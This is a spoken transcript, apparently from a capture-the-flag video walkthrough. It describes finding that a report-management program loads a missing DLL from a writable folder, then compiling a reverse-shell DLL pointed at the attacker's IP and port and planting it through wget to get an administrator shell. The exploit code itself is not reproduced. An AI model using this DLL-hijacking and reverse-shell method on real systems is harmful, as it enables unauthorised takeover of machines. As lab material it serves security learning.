we're filtering something out. Oh, we're filtering out success. That's what it is. I just cleared the filter. That was bad. Like this. We don't need registry. Let's see. There we go. This is what I want to see. So we can see it's querying the libraries and then we see ipsec.dll. So it does nothing after that. I guess we have a TCP send. But let's create what we think it wants, right? If we went back here and we did the strings command, strings ReportManagement.exe, grep libraries after 3. I wanted externalupload.dll. Let's create that and see what happens. So notepad, file, save as, externalupload.dll. Hopefully I don't have any typos there. And then let's actually kill it. Run it, clear it. Scroll near the bottom. Let's see. We need a netcat to it. There we go. Attempting to upload, and it hung. So let's see. We have a process create. So this is what we saw in Ghidra. It doing the process creator. And we can see the command line is report management helper, libraries, externalupload.dll. So that is what we saw all the way back here when we did create process. We looked for it. Here's the report management helper. The second flag, let's see. Where's the create remote process? So what was it creating? We have the command line now, /c, report management helper, libraries, external upload. So we're just passing the DLL over to this executable. So all we have to do now is create a malicious DLL and maybe upload on the web server. So let's try that. The first thing we need to do is find some reverse shell code. So I'm going to do reverse shell Windows DLL and see what we have on Google. Let's see. Maybe that. Or this. Let's see. This looks to be what we need. We have the DLL main right here. So anytime the DLL attaches or does anything, it's going to execute. I wonder what this one looks like. This is a full project. Let's see, where's DLL main? Yeah, both of these are. If you look at some of my other videos, oh, nope, here we go, DLL main. So this is only doing it on process attach. So this is probably the better one, but there's more to it. Like I have to have a project. I'd rather just a single file. So this hopefully will work. Let's copy this. wget, sure. Okay, so what we want to do is replace this with our IP address. So 10.10.14.8, port 9001. And then they use wine to GCC to compile it, but we can probably just use x86. Let's see. W64, mingw. Is it GCC? That should do it. And then the DLL name. And then shared. And what else? LWS. Oh, they don't have shared. It's odd they're doing windows.exe too when it's a DLL. This may not work. What was it called? externalupload.dll. Okay. Let's copy that into our SMB folder. And then let's go in. Do we have it here? Evil. There we do. Split there. 9001. So here we need to go to Program Files, then Report Manager, Libraries, and we can copy 10.10.14.8 shared external upload.dll here. Not found. I think I used xcopy last time. Let's just move it to our www directory, and then we can wget it. 10.10.14.8. 8, we need to specify HTTP. There we go. So now we have our library there. We should be able to netcat localhost 100. And this is set up to go through chisel and 8100. And now if I upload test.pdf, it should load that library we just uploaded. And it did. And we have a shell here. If we do who am I, we are the administrator. So we can do cd/users administrator desktop, and then get the flag. So that's going to be the box. That last step was pretty tough. To sum it up, again, through dynamic analysis and some static analysis, we discovered once all the directories were created, the program itself would look at the libraries directory, and if external upload.dll existed, then it would run the external management helper.exe with that DLL. And I'm guessing that's supposed to have code to upload files, but since we can write that, we can make it anything we want. So we made it a reverse shell. Hope you guys enjoyed it. Take care, and I will see you all next time.